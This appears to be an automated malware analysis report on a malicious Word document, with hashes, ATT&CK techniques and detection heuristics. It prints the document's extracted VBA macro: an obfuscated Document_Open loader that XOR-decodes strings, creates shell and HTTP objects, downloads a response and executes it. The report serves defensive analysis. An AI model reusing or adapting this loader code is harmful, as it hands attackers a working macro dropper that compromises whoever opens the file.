Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 51685bf001412152…

MALICIOUS

Office (OLE)

555.5 KB Created: 2018-06-21 08:14:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 4cc7a61b36f204b5fdff5f3a960e4d66 SHA-1: b7ffbfcaf0ad5ebf95411823bdb8ae9520991990 SHA-256: 51685bf0014121525552c12c2ec348baa4ccf894fe2ed2a41a05b1eaed385351
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample contains a VBA macro that is obfuscated and designed to execute automatically upon opening the document. The macro uses CreateObject to instantiate objects and execute code, likely to download and run a secondary payload. The document body explicitly prompts the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass security measures.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9032 bytes
SHA-256: 084c459950290abb1f52d78e3d630732eb95b416c3c77546d5f4b25e957b6078
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("xlBEuA").Value <> "toto" Then
mZClyKElqvdqDEZ
ActiveDocument.Variables("xlBEuA").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "itYTfsT"
Private Function bKCRAYmCSu(XKImQYIfgW As Variant, TcwjJtADLI As Integer)
Dim NUpTxVGQZx, jrweetPuqk As String, jzOldcsSJE, nUBEPnxOXM
jrweetPuqk = ActiveDocument.Variables("xlBEuA").Value()
NUpTxVGQZx = ""
jzOldcsSJE = 1
While jzOldcsSJE < UBound(XKImQYIfgW) + 2
nUBEPnxOXM = jzOldcsSJE Mod Len(jrweetPuqk): If nUBEPnxOXM = 0 Then nUBEPnxOXM = Len(jrweetPuqk)
NUpTxVGQZx = NUpTxVGQZx + Chr(Asc(Mid(jrweetPuqk, nUBEPnxOXM + TcwjJtADLI, 1)) Xor CInt(XKImQYIfgW(jzOldcsSJE - 1)))
jzOldcsSJE = jzOldcsSJE + 1
Wend
bKCRAYmCSu = NUpTxVGQZx
End Function
Function hDltTNWsfRqGKgo()
On Error Resume Next
Set TsK = CreateObject(bKCRAYmCSu(Array(52, 5, 90), 119) & bKCRAYmCSu(Array(4, 11, 63), 68) & bKCRAYmCSu(Array(65, 27, 55), 10) & bKCRAYmCSu(Array(2, 92, 84, 53), 93))
Set yaTom = CreateObject(bKCRAYmCSu(Array(4), 371) & bKCRAYmCSu(Array(6, 55), 634) & bKCRAYmCSu(Array(12, 125, 117, 84, 18, 27), 743) & bKCRAYmCSu(Array(8, 45, 22), 703) & bKCRAYmCSu(Array(14, 101, 72, 65, 107, 103), 381))
Randomize
yaTom.Open bKCRAYmCSu(Array(18, 40, 46), 142), bKCRAYmCSu(Array(5, 51, 69, 38, 112, 75, 109, 101, 67, 89, 23, 100, 4, 107, 68, 0, 72, 66, 96, 99, 120, _
2, 101), 769) & bKCRAYmCSu(Array(52, 17, 4, 4, 42, 99, 50, 41, 105, 69, 17, 102, 64), 792) & bKCRAYmCSu(Array(78, 10, 92), 378) & CLng(Rnd * 1000000), False
yaTom.Send
wuJXBrM = yaTom.responseText
wmmRTHk = bKCRAYmCSu(Array(24, 91, 47, 92, 30, 26, 7, 83, 25, 28, 122, 13, 33, 87, 21, 65, 2, 94, 23, 53, 81, _
48, 46, 22, 31, 91, 39, 25, 33, 33, 72), 314) & wuJXBrM
ret = TsK.Run(wmmRTHk, 0, True)
End Function
Function mZClyKElqvdqDEZ()
On Error GoTo Err2:
Dim DPtBkuPYn As String
Dim hLUzu As String
Call NGKyEMdedvPoWGe(rgnQFYiBtBIaqyL(), bKCRAYmCSu(Array(21, 16, 39, 51, 113, 17, 17, 54, 67, 46, 31, 47, 39, 62, 62), 643))
DPtBkuPYn = bKCRAYmCSu(Array(11, 0, 33, 120, 24, 52, 4, 24, 102, 54, 87, 90, 86, 5, 1, 71, 53, 16, 26, 6, 35, _
36), 159)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(2, 41, 33, 1, 20, 39, 30, 41), 345))
DPtBkuPYn = bKCRAYmCSu(Array(62, 18, 66, 91, 15, 44, 7, 37, 9, 122, 68, 92, 58, 84, 28, 32, 56, 109), 353)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(44, 89, 44, 10, 37, 83, 26, 60), 60))
DPtBkuPYn = bKCRAYmCSu(Array(13, 92, 24, 74, 2, 0, 42, 45, 15, 45, 86, 34, 65, 80, 92, 113, 0, 83, 71, 63, 88, _
32, 28, 87, 90, 125, 106, 13, 68, 87, 35, 47, 84, 25, 53, 36, 88, 68, 86, 71, 33, _
61, 15, 67, 39, 68, 117, 98, 97, 3, 93, 58, 25, 92, 119, 0, 13, 25, 67, 0, 14, _
8, 3, 63, 3, 81, 93, 85, 46, 90, 10, 85, 92, 52, 23, 25, 67, 23, 25, 59, 89, _
58, 27, 65, 44, 8, 30, 42, 25, 95, 23, 93, 109, 12, 12, 33, 32, 121, 122, 2, 3, _
54, 38, 71, 56, 96, 76, 124, 43, 23, 43, 50, 84, 23, 18, 95, 70, 9, 34, 2, 55, _
29, 6, 6, 50, 9, 29, 18, 85, 122, 32, 40, 46, 82, 91, 26, 29, 106, 106, 26, 2, _
17, 23, 64, 24, 17, 29, 26, 55, 4, 52, 15, 33, 84, 85, 118, 81, 60, 12, 18, 21, _
54, 86, 16, 55, 51, 45, 8, 23, 36, 80, 13, 26, 92, 38, 93, 78, 10, 17, 52, 101), 424)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(39, 41, 38, 85, 30, 51, 34, 57, 61, 53, 58), 732))
DPtBkuPYn = bKCRAYmCSu(Array(5, 50, 56, 85, 2, 28, 56, 119, 80, 35, 20, 6, 19, 117, 21, 13, 43, 83, 22, 57, 73, _
71, 7, 59, 94, 88, 50, 11, 61, 12, 3, 36, 22, 40, 15, 32, 0, 45), 264)
hLUzu = tMNBbAfdzLfceZW(DPtBkuPYn)
Call NGKyEMdedvPoWGe(hLUzu, bKCRAYmCSu(Array(58, 42, 18, 25, 11, 39, 46, 62, 40, 31, 3, 14, 53), 182))
Call hDltTNWsfRqGK
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.